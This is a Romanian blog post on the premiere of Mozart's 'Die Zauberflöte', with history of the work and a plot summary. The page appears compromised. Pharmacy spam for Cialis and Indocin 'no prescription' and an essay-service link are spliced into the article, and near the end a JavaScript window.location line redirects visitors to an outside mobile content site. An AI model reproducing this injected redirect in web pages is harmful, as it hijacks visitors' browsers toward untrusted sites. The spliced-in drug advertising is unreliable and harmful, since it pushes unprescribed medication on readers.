Într-o zi de 30 septembrie…

…in 1791, avea loc premiera operei Die Zauberflöte (“Flautul fermecat”), de Wolfgang Amadeus Mozart. our essays online service

mozart

“Flautul fermecat” este o opera in doua acte, ultima compusa de Wolfgang Amadeus Mozart, pe un libret scris in limba germana de J.E. Schikaneder. Premiera absoluta a operei a avut loc la Viena, la “Burgtheater”, la data de 30 septembrie 1791, sub conducerea muzicala a compozitorului.

Buy Cialis Soft Tabs Online Generic Discount Prices . Men’s Health. Fast Worldwide Shipping, Erectile Dysfunction, Anti-allergic, Cholesterol. Indocin no prescription, Buy Generic Indocin . Aspirin When INDOCIN is administered with aspirin, its protein binding is reduced, although the clearance of freeВ 

La indemnul impresarului Schikaneder, care scrisese libretul dupa o povestire de Liebeskind, conceput sub forma unui “Singspiel” (partile muzicale alterneaza cu proza), Mozart a compus aceasta “chintesenta a artei”, cum a denumit-o Wagner, “improvizand o capodopera de gen cu o perfectiune ce nu a putut fi depasita si care, greu, ar mai putea fi atinsa”. Multi muzicieni considera “Flautul fermecat” si nu “Requiem”-ul, ca testament spiritual al artistului. Compozitorul a dirijat premiera la Viena intr-o sala saracacioasa care datorita “Flautului fermecat” si fondurilor aduse de el a devenit “Theater an der Wien”. Mozart nu s-a bucurat pe deplin de triumful operei sale imbolnavindu-se grav.
Prezentata pentru prima oara cu doar doua luni inainte de moartea lui Mozart, aceasta opera este povestea unui cuplu de indragostiti care trebuie sa treaca prin incercari magice inainte de a fi impreuna. Printul Tamino ajunge din intamplare pe taramul Reginei Noptii, unde este atacat de un sarpe urias. Este salvat de trei doamne, care ii arata un portret al frumoasei Pamina, de care Tamino se indragosteste pe loc. Protejat de un flaut din aur, porneste alaturi de Papageno intr-o noua aventura : sa o salveze pe Pamina, prizoniera vrajitorului Sarastro. Dar Sarastro nu este de fapt un vrajitor, ci un preot intelept, care ii spune frumoasei Pamina ca, desi cei doi sunt predestinati unul altuia, trebuie mai intai sa treaca prin cateva incercari pentru a-si dovedi iubirea. Cand zeii i-au cerut lui Tamino sa nu mai vorbeasca, facand un legamant de tacere, Pamina s-a temut ca totul este pierdut si s-a gandit chiar sa se sinucida. Dar, cu ajutorul spiritelor bune, va capata incredere si va fi alaturi de Tamino cand acesta va trebui sa treaca prin testul focului si testul apei. Depasind toate obstacolele, cei doi indragostiti raman impreuna, fortele luminii inving intunericul, iar flautul canta ultima melodie.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *